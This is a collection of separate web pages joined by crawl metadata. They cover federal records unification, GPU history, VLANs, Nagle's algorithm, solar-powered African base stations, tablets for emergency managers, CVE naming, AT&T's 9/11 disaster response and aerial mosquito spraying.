Government agencies are similarly burdened by the more specific growth of social media and the inherent changes to information management such growth can cause. Just a few years ago, industry surveys indicated that up to 50% of managers were unaware their organizations were legally liable for social media content. Yet the bottom line is: they are.
Deciphering who’s in charge:
This is where management and cultural issues come into play. The IT department may be in charge of storing electronic records, but it may not necessarily be in charge of compliance or policy management. IT and RM executives must therefore work together to establish their proper roles in achieving both consistent compliance and the modernization of key RM processes.
Managing legacy records:
A unified approach can also help agencies address the management and disposal of retired paper records. With unification, the agency in question is required to inventory and benchmark its information assets, regardless of the format or location of its records, thus allowing for easy access and retrieval. This unified effort can also help determine which paper records to digitize and which to keep in paper form.
Why Unify Records Now?
While the concept of unified records management is not new, the pressure to achieve unification has intensified in recent years. This is largely due to the current administration’s ongoing efforts to promote greater transparency and better information oversight. In addition, key deadlines intended to drive agencies towards the digitization and streamlining of records management practices are already upon us. In fact, the mandatory first step, a deadline requiring agencies to identify all permanent records in existence for more than 30 years, already passed us on Dec. 31, 2013. According to a December 2013 MeriTalk survey, just over half (54%) of records managers expected to able to meet this first major requirement on that date. What’s more, 92% of respondents believed their agencies must take extra measures to meet the directive deadlines. Yet the longer agencies delay in getting started, the more difficult it will be to keep pace with continually evolving federal mandates.
For federal agencies today, one of the biggest challenges implicit in unifying information is the building of a solid foundation — a foundation that starts with establishing a single, consistent system of record. On the next page are steps for getting started.
Benefits of Unified Records Management
By deploying a comprehensive unified solution to address records management, agency records officers and IT professionals gain the ability to:
- Reduce risks inherent in managing information in multiple formats across a variety of locations for end users with different access needs.
- Lower costs by reducing the total amount of data stored, and likewise by enabling records managers to make better, more informed decisions about which records to store in digital formats and which to store on paper.
- Respond quickly and comprehensively to changes in FOIA and e-Discovery compliance requirements as they arise, resulting in reduced costs and reduced risks to the organization.
Reframing the Challenge
Much like the unification of physical records, the unification of electronic records is largely focused on improving the way in which key policies are applied. Many organizations in both the private and public sectors find that it’s helpful to re-apply the skills and knowledge gained from unifying physical documents when creating a new electronic system. While such cross-pollinating can be useful, Iron Mountain advises federal agencies to take a measured approach and suggests organizations keep in mind the innate differences between managing physical documents and overseeing digital records when creating an information management plan.
In reframing the challenges involved in unifying records management, agencies need to be able to:
- Apply policies, retentions and holds uniformly across all record formats
- Classify records of all types upon creation for efficiency, consistency and defensibility.
- Enable users to find the records they need quickly and efficiently.
- Speed up e-Discovery and FOIA searches using both an integrated platform and a system of reliably classified records.
A discussion guide for Records Unification
The following questions are designed to facilitate discussion among records managers, IT managers and compliance managers:
- When it comes to unifying our physical and electronic records, which of the following challenges present the biggest obstacles for our agency: explosive digital record growth, social media, unclear leadership or ownership, the managing of legacy records, or the application of an appropriate retention policy? Are there other challenges that present similar problems?
- What is the greatest benefit to be gained if we were to unify our records? How could this benefit be tangibly demonstrated to senior agency leadership?
- Do we already have enterprise content management systems that offer records management capabilities, and, if so, how are we currently employing them?
- What challenges have we encountered while trying to connect systems so they can share common policies?
Driving Operational Improvements
Unifying electronic and physical records can bring significant operational productivity to government institutions. Such productivity includes:
By establishing a single policy to uniformly address both electronic and paper records, any organization can achieve economies of scale in training employees and in making adjustments to its policies. Why? Such practices and changes can now be rolled out at the same time across the entire organization. For Continuity of Operations Plans (COOP), each agency gains the ability to find and recover vital records when they are most needed.
With all records subject to the same policy management and enforcement, employees can become practiced at finding and accessing records as needed for FOIA, e-Discovery or other regulatory requirements. The potential costs of e-Discovery will decrease, as will the costs associated with finding, accessing and producing documents in a timely manner.
By applying policies consistently to records of all types across the enterprise, federal agencies can have a much more defensible position for both legal holds and the destruction of records. According to Iron Mountain’s research, an impressive 60% of organizations reported having aligned governance policies for electronic and physical records, but only 33% reported an alignment on policy application for holds and destructions across all media types.6
Caring for all platforms:
The Iron Mountain® Federal Information Asset Framework is designed to help Federal IT and RM professionals gain control over the entire information management process, and leverages Iron Mountain proven services along with best-of-breed partnerships that integrate ECM and Cloud platform needs to create a program that allows for better access and search capabilities to speed E-Discovery, FOIA response and increased productivity overall for agencies in meeting their missions.
By 2019, federal agencies are required to manage all permanent electronic records in electronic format in order to achieve compliance with the Presidential Directive on Managing Government Records.
By 2019, federal agencies are required to manage all permanent electronic records in electronic format in order to achieve compliance with the Presidential Directive on Managing Government Records. During NARA’s Industry Day on September 11, 2013, officials estimated that only two to three percent of federal records should be considered permanent. Iron Mountain can help agencies digitize their mission critical permanent records, while helping to effectively manage the remaining 97% of records that fall into the “temporary” category.
To get the job done, agencies must start now. This is why Iron Mountain developed the Federal Information Asset Framework (please visit http://programs.ironmountain.com/content/IMNAFederalVirtualToolkit for more details).
With a comprehensive records management plan in place, agencies can expect to meet all pertinent directive deadlines and discover added savings. Such a plan can be implemented through careful review of current records management practices. This type of assessment aids agency leaders in achieving their buy-in on modernization while allowing them to work with industry partners to uncover cost savings for both physical and digital record management.
Iron Mountain is committed to applying a well-designed management methodology to empower federal agencies. We can help you unify current systems that collect and digitize records using a prudent conversion schedule to help prepare for Enterprise Content Management (ECM) system use.
By partnering with Iron Mountain, agencies gain the resources and expertise of the world’s leading records management provider. Iron Mountain can help design and execute the procedures necessary to store records in secure, environmentally controlled, CFR-compliant facilities. And, should disaster strike, agencies working with Iron Mountain can rest assured they will be able to retrieve vital information and implement Continuity of Operations Plans (COOP) while continuing to serve constituents and meet mission objectives.
Iron Mountain stands ready to assist you and your organization as a trusted adviser for total records and information management unification. Regardless of your agency’s starting point within the framework — whether you need help determining which records to digitize, migrating to electronic records management or securing storage to maintain your agency’s vital information assets — Iron Mountain and our partners can help you transform your operations. This will empower you to effectively support the needs of your agency’s stakeholders and constituents alike and can help you fully address the records directive.
There is no better time to take action toward a unified information management plan. Visit http://programs.ironmountain.com/content/ IMNAFederalVirtualToolkit today.
1 “The Digital Universe in 2020: Big Data, Bigger Digital Shadows, and Biggest Growth in the Far East,” IDC, December 2012, 2 “Big Data or Too Much Information?” Smithsonian, May 7, 2012 US, 3 http://www.archives.gov/records-mgmt/resources/self-assessment-2012.pdf MeriTalk, December 2013, 5 Ibid, 6 “Federal Records and Information Management: Ready to Rumble?” MeriTalk, December 2013. | <urn:uuid:78c3043d-ec6e-4566-97b0-a6110e9d4593> | CC-MAIN-2017-04 | http://www.ironmountain.com/Knowledge-Center/Reference-Library/View-by-Document-Type/White-Papers-Briefs/W/Why-its-Crucial-to-Start-Unifying-Physical-and-Electronic-Records-Now.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00032-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932414 | 2,976 | 2.546875 | 3 |
What do the Atari 2600 and Tianhe-1 have in common? It may be difficult to imagine, but both systems are examples of the use of cutting-edge graphic processers for their times. This demonstrates the fascinating evolution of the GPU, which today is one of the most critical hardware components of supercomputer architectures.
Techspot’s Graham Singer recently put together a compelling series on the history of the GPU, stretching from the earliest 3D work in the 1950s through today’s GPGPU market. Singer broke his history into four distinct stories.
Singer’s first installment looked at the early days of 3D consumer graphics, a period that lasted from 1976 to 1995. Although 3D graphic systems were being built as early as 1951, when MIT built the Whirlwind flight simulator for the Navy, the graphic 3D systems that developers created for the burgeoning consumer computer market in the mid-1970s formed the foundation for today’s GPU, Singer writes.
The “Pixie” video chip that RCA built in 1976 was capable of outputting a video signal at a resolution of 62×128. 1977 saw the release of the Atari 2600 game system, which included the Television Interface Adapter (TIA) 1A. Motorola followed suit a year later with MC6845 video address generator, which became the basis for the Monochrome and Color Display Adapter (MDA/CDA) cards that IBM started using in its PC of 1981.
The Extended graphics Adapter (EGA) developed by Chips and Technologies started to provide some competition to the MDA/CDA cards starting in 1985. The same year, three Hong Kong immigrants formed Array Technology Inc. The company, which soon changed its name to ATI Technologies Inc., would lead the market for years with its Wonder line of graphics boards and chips.
In 1992, SGI released OpenGL, an open API for 2D and 3G graphics. As OpenGL gained traction in the workstation market, Microsoft attempted to corner the emerging gaming market with its proprietary Direct3D API. Many other proprietary APIs were introduced, such as Matrox Simple Interface, Creative Graphics Library, C Interface (ATI), and others, but they would eventually fall by the wayside.
Meanwhile, the early 1990s was a period of great volatility in the graphics market, with many companies being found, and then being acquired or going out of business. Among the winners that would be founded during this time was NVIDIA.
The second epoch in Singer’s series lasts from 1995 to 1999, and is characterized by the utter domination of the market by 3DFx’s Voodoo graphics card, which launched in November 1996 and soon came to account for about 85 percent of the market. Cards that could only render 2D were made obsolete nearly overnight, Singer writes.
3DFx went public in 1997, but the launch of its budget-minded Voodoo Rush board was a flop. And in a bid to boost profits, the company decided to market and sell graphics boards itself, which further helped competitors, including Rendition, ATI, and Nvidia.
Nvidia laid the groundwork for future success with the 1997 launch of the RIVA 128 (Real-time Interactive Video and Animation accelerator), which featured Direct3D compatibility and topped several performance benchmarks. By the end of 1997, Nvidia had nearly 25 percent of the graphics market. Nvidia was sued by SGI in 1998, but Nvidia emerged stronger after the settlement in 1999, in which SGI gave Nvidia access to its professional graphics portfolio. This amounted to a “virtual giveaway of IP” that hastened SGI’s bankruptcy, Singer writes.
The battle between ATI and Nvidia marks Singer’s third era of the GPU’s history, which lasted from 2000 to 2006. During this period, 3dfx became increasingly irrelevant, as its cards, such as the Voodoo 4 4500, could not keep up with the graphics performance offered by Nvidia’s GeForce 2 GTS and ATI’s Radeon DDR.
Nvidia and ATI would go head to head and deliver graphics cards with features are now commonplace, such as the capability to perform specular shading, volumetric explosion, refraction, waves, vertex blending, shadow volumes, bump mapping and elevation mapping.
The coming of the general purpose GPUs would begin in 2007, which kicks off the fourth era of Singer’s GPU history. Both Nvidia and ATI (since acquired by AMD) had been cramming ever-more capabilities into their graphics cards, and the practice of using these cards for HPC workloads became common.
But the two companies would take different tracks to GPGPU, with Nvidia releasing its CUDA development environment, and AMD using OpenCL. Nvidia gained considerable market- and mindshare in the HPC market with the launch of the Tesla, the first dedicated GPGPU. | <urn:uuid:a005cdbc-b4cb-4327-a9b4-e2d130c6ca7f> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/08/21/the_modern_gpu_a_graphic_history/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00272-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966831 | 1,000 | 2.984375 | 3 |
The design of layer-2 switched network is somewhat like flat network. Each and every device on the newtork can see the transmission of every broadcast packet even if it does not need to receive the data.
The Structure of Flat Network
The routers permit the broadcasting within the originating network only but it does switch forward the broadcasts in each and every compartment or segment. It is called flat network not because of its flat design but due to the reason that it has a single broadcast domain. As shown in the figure the broadcasting by Host A is forwarded to all the ports on all switches leaving the port that received it in the beginning.
In the second figure you can see a switched network sending frame with Host A and Host D as its terminal/destination. You can notice that the frame has forwarded out only the port where the Host D is situated. This is a great advancement if you compare it with old hub networks but if you want one collision domain by default then you may not like it.
So, the biggest advantage of layer-2 switched network is that it establishes a particular collision domain segment or compartment for every single equipment connected to the switch. As a result larger networks can be established and there is no compulsion of Ethernet distance anymore. That does not mean it is completely free from issues-when the number of devices and users is greater then each switch has to deal with more packets and broadcasts.
Security is also another issue within the typical layer-2 switched internetwork as all the devices are visible to all the users. The drawback is that it is not possible to stop the broadcast from devices as well as the response of the users to these broadcasts. Sadly, the choice of security is restricted when it comes to passwords placing on various servers as well as on other devices. But not if you establish a virtual LAN. On the other hand, many issues can be resolved that are related with layer-2 switching with the help of VLANs. The VLANs makes network management easy with number of ways:
- The VLAN can categorize many broadcast domains into number of logical subnets.
- The network needs to configure a port into the suitable VLAN in order to achieve change, add or move.
- In the VLAN a group of users with the demand of high security can be included so that the external users out the VLAN cannot interact with them.
- When it comes to logical classfication of users in terms of function, we can consider VLAN as independent from their geographic or physical locations.
- Even the security of network can be enhanced by VLAN.
- The number of broadcast domains are increased with VLANs while the size decreases. | <urn:uuid:0eddb5d9-d078-46bd-95c0-f9428e0b3887> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2012/why-we-need-vlans | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00106-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957798 | 545 | 2.828125 | 3 |
How Nagle’s algorithm is making TCP/IP better and when is ok to use it. Truth be told, Nagle should be avoided in today’s high-speed networks.
This article it’s not about mathematics, don’t be afraid. I’m running a networking blog and it’s not my intention to speak or write about anything related to mathematics. Biggest math problem that I’ve done in last few years is some simple subneting, EIGRP metric calculation and that is where I stopped with math for now.
On the other hand, I love the theory behind algorithms, specially if the algorithm is used in networking and if it is so simple and powerful as Nagle’s algorithm.
You can guess, John Nagle is the name of the fellow who created the algorithm. He found a solution for TCP/IP efficiency issue also known as “small packet problem”.
Here’s what happens:
If you decide to send, let’s say, one single letter across the network to some destination, your machine will probably take that one letter and send it immediately across the network, right?
Ok, a bit of math now. One letter or some other single character, when converted to binary, will take on byte of data. Here’s an example with few letters from ASCII code table. Red are the binary for first few letters:
Ok, so If you decide to send one single letter across the network your PC will take that one byte of data and encapsulate is with 40 bytes of header.
40 bytes of header is a normal size of the header, 20 bytes for TCP and 20 bytes for IPv4.
You see here that we will basically have 4000% header overhead giving that payload could be up to 1500 bytes and we have only one byte. Either way the header stays the same size. 40 bytes header for 1500 bytes payload is not a big overhead, but 40 bytes header for 1 byte of payload is pretty bad.
One of the examples that sends one by one character across the network is Telnet sessions. Telnet will send the characters as you type. Over slow links, many telnet packets will be in transit at the same time, making the link congested.
Nagle came up with an great idea. Small outgoing data pieces will be buffered, combined together and sent out all at once in one single packet. In details, as long as client is waiting the acknowledgement for previously sent packet it will not send another one until the buffered bytes of data are not enough to fill up the packet (up to maximum payload size).
if there is new data to send if the window size >= MAXPAYLOAD and available data is >= MAXPAYLOAD send complete MAXPAYLOAD segment now else if there is unconfirmed data still in the pipe enqueue data in the buffer until an acknowledge is received else send data immediately end if end if end if
where MAXPAYLOAD = maximum segment size.
Nagle’s algorithm works basically by intentionally delaying packets. By doing this it increases bandwidth efficiency and makes latency worse by increasing it too.
Time sensitive applications that need real-time interaction with destination can use TCP_NODELAY to bypass the Nagle delay, or simply use UDP.
Today’s networks with huge throughput are not the place where you should use Nagles’s algorithm. Most of the applications today are real-time apps that communicate with server all the time with response to user expected instantly. Having non-blocking network devices and 10G network speeds is making any kind of intentional delay unwelcome. | <urn:uuid:d94b28b2-ed67-4115-b7f7-413ebad95948> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2015/nagles-algorithm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00106-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.890655 | 755 | 3.09375 | 3 |
African mobile-service providers are tapping into solar energy to power base stations and connect users in remote areas to mobile networks.
Africa's largest mobile telecommunication company MTN (Mobile Telecommunication Network) and the east African regional service provider Safaricom are using solar energy and bio-fuel, they have announced. MTN operates in 21 African countries, including Zambia, Uganda, Nigeria, Ghana and South Africa.
Lack of access to electricity in rural areas has always been blamed for sparse mobile connectivity in more remote parts of Africa. Mobile service providers have also been unwilling to invest in some areas that have electricity because frequent power failures increase costs.
Solar-energy-powered base stations are already used in Malawi and Morocco where telecommunication equipment manufacturer Ericsson has developed solar-powered base stations for rural areas without access to electricity. And in Namibia the country's mobile telecommunication company, MTC, is trying solar-powered base stations as well.
Ericsson and MTN are also developing a project to power base stations using bio-fuels from palm and pumpkin seeds.
"MTN wants to use clean technologies that are environmentally friendly," said Fred Mokoena, MTN Zambia chief sales and marketing officer.
Statistics from the International Telecommunication Union (ITU) indicate that Africa uses about 30 million liters of diesel every year to power mobile base stations. But ever-rising fuel prices raise operating costs and negatively affect the environment.
The ITU suggests that African governments should help accelerate the continent's mobile-phone connectivity by offering import duty waivers and tax reductions to local companies supplying equipment based on renewable energy to mobile operators.
Two months ago, the Zambian government zero-rated the importation of solar system and other renewable energy equipment to make it easier and cheaper for local companies supplying solar energy equipment in the country. | <urn:uuid:8c10753c-d475-46b8-837e-d7777f7aa905> | CC-MAIN-2017-04 | http://www.cio.com/article/2436067/infrastructure/african-mobile-service-providers-tap-into-solar-energy.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00226-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935451 | 378 | 2.53125 | 3 |
DELL EMC Glossary
What is Platform as-a-Service (PaaS)
Platform as a Service (PaaS) is a cloud-based environment you can use to develop, test, run and manage your applications on. This approach delivers the development environment you need, without the complexity of buying, building or managing the underlying infrastructure. As a result, you can work faster and release your applications quicker.
Who uses PaaS and why?
Developers look to PaaS to go to market faster, innovate and experiment with new technologies using existing public, private or hybrid cloud infrastructures.
How does PaaS work?
PaaS enables developers to accelerate the pace of applications developments while reducing complexity. Users can provision, deploy and manage applications using one unified management system.
What are the benefits of PaaS?
PaaS enables the creation and deployment of web-based application software without the cost and complexity of buying and managing underlying hardware, operating software, and utilities. The PaaS environment provides the entire IT resource stack as a service. It provides all of the facilities required to support the complete lifecycle of building and delivering web-based applications. | <urn:uuid:db22217a-9e4f-480f-9db7-7ebeae131f47> | CC-MAIN-2017-04 | https://www.emc.com/corporate/glossary/platform-as-a-service.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00436-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.899786 | 248 | 3.0625 | 3 |
After heavy hail hit 150 homes in Montgomery County, Ky., last March, the county’s emergency management director, Wesley Delk, set out to assess the damage. A key tool: an Android-based tablet computer that he used to take notes as well as geotag photos. He was able to add the pictures to a map later, showing where damage had occurred.
Delk and his deputy both use tablets for their daily work. “Now it’s engrained into the processes that we do,” he said. But it took about a year from the time Delk first started experimenting with work uses for his personal iPad until it became department policy to issue tablets.
Tablet computers are single-panel touchscreen computers that are smaller than a laptop but larger than a phone. Apple’s iPad made tablets popular with the public, and now users can choose from several consumer options: iPads, BlackBerry devices, Windows tablets or those that run Google’s Android operating system. Smaller tablets, such as Amazon’s Kindle Fire and Apple’s iPad Mini, also are available. And first responders whose work environment would be too hard on a consumer tablet can consider rugged tablets that are more durable.
Tablets are increasingly being adopted by the emergency management community for everything from note taking to sending warnings from the field. Tablets’ mobility and connectivity are big advantages.
|The National Library of Medicine has a Web page with links to government and nonprofit mobile apps for emergency managers:
There are many options for using tablets to make emergency management work more efficient:
When Bartlett gets a warning about a severe weather watch, he opens a weather app to check the radar. He also uses a free GIS app that helps to measure distances. When a hazardous chemical spill occurred near campus, Bartlett pulled up weather information on his tablet to find out the wind direction. He looked up the isolation distances for the chemical that had spilled and used a GIS app to measure how far the chemical was from the nearest campus building.
“It was unprecedented to have all of that information and tools available at your fingertips, using one single tool,” Bartlett said.
One of the key attractions of tablets is that many tools people use at home can also help at work, including video-conferencing applications, GPS tools and file sharing services like Dropbox.
“Nobody designed Google as an emergency response tool, and yet it’s difficult to imagine many emergency responders who don’t frequently use Google as part of their job,” Botterell said.
There are, however, specialized apps for emergency managers. Cargo Decoder, for example, is a searchable version of the Emergency Response Guidebook that is distributed by transportation authorities in the United States, Canada and Mexico. A user can type in the four-digit code from the side of a truck or tanker and get more information about how to handle the substance inside in an emergency.
Unlike the printed version of the handbook, the electronic version is searchable by the name of the substance, the four-digit code, or just part of the four-digit code.
“It’s a way of getting to the information you want as quickly as possible,” said Marsh Gosnell, founder of Strategies In Software in East Windsor, N.J. He made the Android version of the app in 2010 and an iOS version last year.
The National Library of Medicine, part of the National Institutes of Health, has created a mobile app for emergency responders called Wireless Information System for Emergency Responders (WISER) that allows emergency responders to identify unknown substances (searching by characteristics such as smell, color and human exposure symptoms). It can also produce a map showing the protective distance from a substance from the user’s current location or an address the user provides.
“First responders and hazmat professionals have only a few minutes to be able to get the information they really need, so we try to put it in an easily digestible form,” said Jennifer G. Pakiam, a technical information specialist with the Disaster Information Management Research Center at the National Library of Medicine.
As more emergency management professionals start using tablets, demand will grow for even more specialized apps.
“I think there are going to be a lot of new products coming soon because more agencies are adopting the platforms,” Delk said. “That’s giving additional incentive to the developers to make the products we need.”
For emergency management departments considering using tablets, there are some possible downsides to consider:
In addition, anytime you are sending data over the cellular service, it could be at risk, especially if it’s not encrypted. “Your data is out there; it’s traveling from one point to another by the Internet,” Delk said.
For some emergency responders, the visual interface of a tablet computer may be a hindrance, Botterell said. Firefighters and police officers, for example, may want to “keep their eyes on the situation” and use a device with a voice-activated interface instead.
There’s another issue related to cost, however: network reliability. Commercial networks may not always have enough capacity for a surge in use during an emergency. “How much money are the wireless carriers spending on capacity and battery backup systems and all of the marginal investments that affect system reliability?” Botterell said.
Emergency management professionals who decide to use tablets face a new set of decisions: what type to get.
Because the specific features available are constantly changing, it’s best to evaluate the pros and cons (including features like camera technology, Wi-Fi capability and ease of use) of the models available at the time of purchase. Compatibility with your office computers may be less important than compatibility with smartphones you already have, since many apps run on both smartphones and tablets.
Those who are concerned about durability may want to look into rugged tablets, made to meet military specifications. MobileDemand’s T7200 has a 7-inch screen, for example, and can withstand being dropped on concrete, being put underwater, and being stored in extreme cold and heat. MobileDemand’s tablets cost between $1,900 and $3,800 depending on the configuration.
MobileDemand’s primary customers for these tablets are EMS, fire and police departments, as well as the military. “If they’re an indoor user, they’re calling the wrong number,” said Wayne Randolph, U.S. public sector manager for MobileDemand, in Hiawatha, Iowa.
The options are continually expanding, both for devices and for the apps that make emergency managers’ lives easier.
“There’s wonderful stuff being done, and we’ve just begun to explore the possibilities,” Botterell said. | <urn:uuid:9164309e-3f12-4781-be87-6c2d070e166a> | CC-MAIN-2017-04 | http://www.govtech.com/em/training/Tablets-Adoption-Emergency-Managers.html?page=1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00464-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944451 | 1,431 | 3.03125 | 3 |
Tech Glossary – D
DDR (Double Data Rate)
Stands for “Double Data Rate.” It is an advanced version of SDRAM, a type of computer memory. DDR-SDRAM, sometimes called “SDRAM II,” can transfer data twice as fast as regular SDRAM chips. This is because DDR memory can send and receive signals twice per clock cycle. The efficient operation of DDR-SDRAM makes the memory great for notebook computers since it uses up less power.
DDR2 (Double Data Rate 2)
DDR2 RAM uses a different design than DDR memory. The improved design allows DDR2 RAM to run faster than standard DDR memory. The modified design also gives the RAM more bandwidth, which means more data can be passed through the RAM chip at one time. This increases the efficiency of the memory.
Adding and deleting files from your hard disk is a common task. Unfortunately, this process is not always done very efficiently. If you have a ton of “fragmented” files on your hard disk, you might hear extra grinding, sputtering, and other weird noises coming from your computer. Defragmenting your hard disk is a great way to boost the performance of your computer.
A driver is a small file that helps the computer communicates with a certain hardware device. It contains information the computer needs to recognize and control the device. In Windows-based PCs, a driver is often packaged as a dynamic link library, or .DLL file. In Macs, most hardware devices don’t need drivers, but the ones that do usually come with a software driver in the form of a system extension, or .KEXT file.
A dual-core processor is a CPU with two processors or “execution cores” in the same integrated circuit. Each processor has its own cache and controller, which enables it to function as efficiently as a single processor. However, because the two processors are linked together, they can perform operations up to twice as fast as a single processor can. | <urn:uuid:a5556a34-dfb0-49a2-8692-a48d4abb3994> | CC-MAIN-2017-04 | http://icomputerdenver.com/tech-glossary/tech-glossary-d/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00096-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946875 | 426 | 3.765625 | 4 |
Networks can be virtualized, but most are not. Network infrastructure springs from hardware design concepts that predate the concept of virtualization. Even the "virtual" local area network must be defined in hardware, when it should be set in software.
In many cases, switches, routers, and controllers depend on their embedded spanning tree algorithms. Spanning tree is an arithmetical determination of the most efficient path for a message to follow in a given network and results in a hierarchy of devices. After the mapping is implemented, not a lot more can be done. Spanning tree is built in and each device knows its place in the map. That leaves the network calcified in place, unyielding to momentary demands and resistant to taking on an assignment of different characteristics.
As sleeping virtual machines come to life, or reach peaks of operation during the workday, it would be nice to be able to allocate and reallocate their network resources, based on where the traffic is. For that matter, when a new virtual machine is spun up in three minutes, it would be great to get its network allocation at the same time instead of waiting three days for a network engineer to rig its network services. Why can't automated policies be applied to the VM's networking, like those for CPU, memory, and storage? Those policies are already in place and ready to be implemented at the moment of a VM's creation. Why is networking a holdout?
The reason is there are still barriers to treating networking as a programmable or software-defined resource. The virtualization phase that has swept through the data center is still washing up on networking concepts expressed as devices hard-wired together. What's needed is to free the network from the underlying hardware. It should be a more malleable entity that can be shaped and reshaped as needed. Part of the purpose for lifting the network definition above the hardware is to escape the limitations of the spanning tree algorithm, so useful in its day, now outmoded by virtualization.
Escape from spanning tree can be done if your network vendor supplies virtualization management atop its hardware devices, but then you must use one vendor's equipment exclusively. Most enterprise networks are a mix, making virtualization harder to implement. So what's really needed is a separation of the switching control plane, currently the spanning tree algorithm's fiefdom, from its direct link to the hardware. By allowing a new set of policies or flexible algorithms to run the hardware, we can adapt the network to the world of virtualization.
One way to do so is to adopt a much more flexible approach to network algorithms called OpenFlow, from a research project at Stanford. The difference between spanning tree and OpenFlow is summed up in a statement by Guido Appenzeller, CEO of the startup Big Switch Networks and a director of the Clean Slate research project on network redesign at Stanford: "I don't want to configure my network. I want to program my network," he said in an interview. Appenzeller said he's just echoing a statement he heard from James Hamilton, distinguished engineer at Amazon Web Services. There is an awareness of how applications have been separated by virtualization from the hardware and a widespread wish that something similar would happen with networks.
"Networking needs a VMware," said Kyle Forster, a co-founder of Big Switch and vice president of sales and marketing. Big Switch was created to fill that ambition--founded to take advantage of the OpenFlow protocol that came out of Stanford's Clean State project in 2008 and backed with $11 million in venture capital, for starters. | <urn:uuid:28f88fd6-c428-4521-aebf-90cd74a21fe5> | CC-MAIN-2017-04 | http://www.networkcomputing.com/networking/virtualization%E2%80%99s-urgent-next-step-openflow-networks/966061821 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00401-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950825 | 732 | 2.546875 | 3 |
World Trade Center Disaster Response
AT&T's Network Disaster Recovery (NDR) Team was activated immediately following the destruction of the World Trade Center towers on the morning of September 11, 2001. The team was deployed to support the recovery of damaged AT&T network facilities and to provide emergency communications for the relief effort in lower Manhattan.
An Emergency Communications Vehicle (ECV) was deployed to NYPD's backup command center in lower Manhattan. The ECV provided telephone service for administrative use and for use by the families of missing NYPD members. The ECV was in service at NYPD headquarters from Wednesday, September 12, until Friday, September 21.
On September 21, the ECV was moved so it could provide free telephone service for relief workers at the WTC disaster site. Phone lines from the ECV were brought into the Spirit of New York, a dinner cruise ship moored in North Cove Yacht Harbor, adjacent to the World Financial Center. The ship was converted for use as a food and rest station for the rescue workers. The ECV remained in service there until Thursday, October 4.
Over 20,000 calls were placed over the ECV link at the NYPD deployment and over 36,000 calls were placed during the Spirit of New York deployment. | <urn:uuid:93e59101-9d4b-4b50-8387-e32ee301e052> | CC-MAIN-2017-04 | http://www.corp.att.com/ndr/humanitarian_relief_2001_09_wtc.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00455-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.973851 | 253 | 2.5625 | 3 |
Common Vulnerabilities and Exposures (CVE)
In information security jargon, vulnerabilities refer to potential openings for attack or system penetration based on possibly flawed or erroneous design decisions, protocol implementations, software characteristics and other matters, whereas exposures address ways to obtain unauthorized access to systems, such as through system fingerprinting and scanning, that not everyone may agree also constitute vulnerabilities. In fact, there’s a fascinating discussion on this terminology and why it’s important available on the CVE site—very much worth reading for those interested in why there’s so much fuss about names and terms.
The goal of the CVE list is to create a common lexicon of names for vulnerabilities and exposures, so that all who work in the area can agree on a common set of terms. Potential terms are submitted for editorial review by the CVE board, granted specific identifiers, linked to technical descriptions and associated with relevant security alerts, bulletins, reports and other documents that identify and describe them. For example the Sasser worm currently bears the CVE cognomen CAN-2003-0533. This may be decoded as follows: “This is a candidate (CAN) item submitted in 2003 with entry number 0533.” On its Web page, you’ll also find pointers to relevant CERT, Microsoft, EEYE and BugTraq documents that describe the Local Security Authority vulnerability that lets the Sasser worm do its thing.
Please note that this common list of terms, while both useful and informative, does not focus on exploits (and hence will not respond to many virus, worm or Trojan names, no matter how well publicized or virulent they may be or have been). It focuses on vulnerabilities and exposures. Thus, searching the list depends on knowing about the vulnerabilities or exposures that makes exploits possible, rather than working directly from those exploits themselves. Those interested in working from exploit information will be better served by searching the virus encyclopedias at VirusList.com or Symantec’s SecurityResponse Web pages. | <urn:uuid:69580e41-d5be-473c-b1f6-1428001a6557> | CC-MAIN-2017-04 | http://certmag.com/security-spotlight-common-vulnerabilities-and-exposures-cve/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00575-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917945 | 412 | 2.953125 | 3 |
On the hot and humid Florida Keys, aerial spraying plays a vital role in controlling the mosquito population. The Florida Keys Mosquito Control District uses advanced computer modeling and sophisticated technology to attack breeding grounds for these airborne pests.
District activities are divided into two functions: spraying for existing mosquitoes, and spotting and eliminating larva sites in the water.
Both tasks rely on helicopter flights and a sophisticated spray management system that guides the pilot to the right areas and records the concentration of pesticide being released.
Flight and spray patterns are determined at the district office and saved onto a memory card, which is uploaded to the helicopter’s onboard system. For larva sites, inspectors note locations by hand, and that data is placed on digital maps.
While in flight, an automated system consisting of two GPS antennae and a wind measurement probe records data and monitors the wind speed and aircraft direction. Spraying goes on and off automatically to ensure the cloud drifts over the appropriate area.
